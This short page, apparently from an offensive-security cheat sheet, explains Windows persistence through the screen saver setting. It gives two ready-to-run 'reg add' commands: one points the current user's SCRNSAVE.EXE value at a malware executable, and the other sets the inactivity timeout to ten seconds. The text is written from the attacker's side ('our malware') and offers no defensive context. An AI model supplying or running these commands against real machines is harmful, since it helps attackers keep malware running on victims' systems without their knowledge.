Screen Savers
Screen Savers are triggered by user inactivity. We can set these screensavers to run our malware after a certain timeframe of inactivity to achieve persistence.
To do this, issue the following command:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "c:\exec" /f
To configure the time period of user inactivity until our screen saver launches(in seconds)
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f
Copy link